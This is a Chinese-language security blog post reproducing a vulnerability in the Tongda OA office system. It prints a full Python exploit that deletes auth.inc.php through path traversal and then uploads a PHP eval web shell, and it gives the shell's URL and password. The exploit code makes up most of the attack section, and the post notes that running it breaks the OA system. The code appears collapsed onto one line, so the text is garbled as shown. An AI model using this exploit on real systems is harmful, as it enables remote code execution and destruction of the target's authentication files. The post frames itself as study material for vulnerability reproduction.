0x01 漏洞描述
通达OA(Office Anywhere网络智能办公系统)是由北京通达信科科技有限公司自主研发的协同办公自动化软件,是与中国企业管理实践相结合形成的综合管理办公平台。
通达OA为各行业不同规模的众多用户提供信息化管理能力,包括流程审批、行政办公、日常事务、数据统计分析、即时通讯、移动办公等,帮助广大用户降低沟通和管理成本,提升生产和决策效率。
0x02 环境搭建
此过程略(傻瓜式一键安装)
auth_inc.php 文件这里先做个备份,以防止在利用exp删除之后可以恢复OA系统(这是在本地搭建,若果在客户现场测试建议客户先做好备份)
搭建成功之后登录系统是这个酱紫
0x03 漏洞复现
直接甩出某大佬写的exp(简单粗暴)
import requeststarget="http://192.168.168.130/"payload="<?php eval($_POST['agan']);?>"print("[*]Warning,This exploit code will DELETE auth.inc.php which may damage the OA")input("Press enter to continue")print("[*]Deleting auth.inc.php....")url=target+"/module/appbuilder/assets/print.php?guid=../../../webroot/inc/auth.inc.php"requests.get(url=url)print("[*]Checking if file deleted...")url=target+"/inc/auth.inc.php"page=requests.get(url=url).textif 'No input file specified.' not in page:print("[-]Failed to deleted auth.inc.php")exit(-1)print("[+]Successfully deleted auth.inc.php!")print("[*]Uploading payload...")url=target+"/general/data_center/utils/upload.php?action=upload&filetype=nmsl&repkid=/.<>./.<>./.<>./"files = {'FILE1': ('agan.php', payload)}requests.post(url=url,files=files)url=target+"/_agan.php"page=requests.get(url=url).textif 'No input file specified.' not in page:print("[+]Filed Uploaded Successfully")print("[+]URL:",url)else:print("[-]Failed to upload file")
成功利用,连接地址
http://192.168.142.130/_agan.php // 密码:agan
虽然getshell但是OA系统已损坏
仅供学习参考,切勿用于非法用途,复现漏洞建议自行搭建环境,切勿直接用网上搜索引擎搜索测试
0x04 参考链接
https://blog.csdn.net/God_XiangYu/article/details/108091470
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论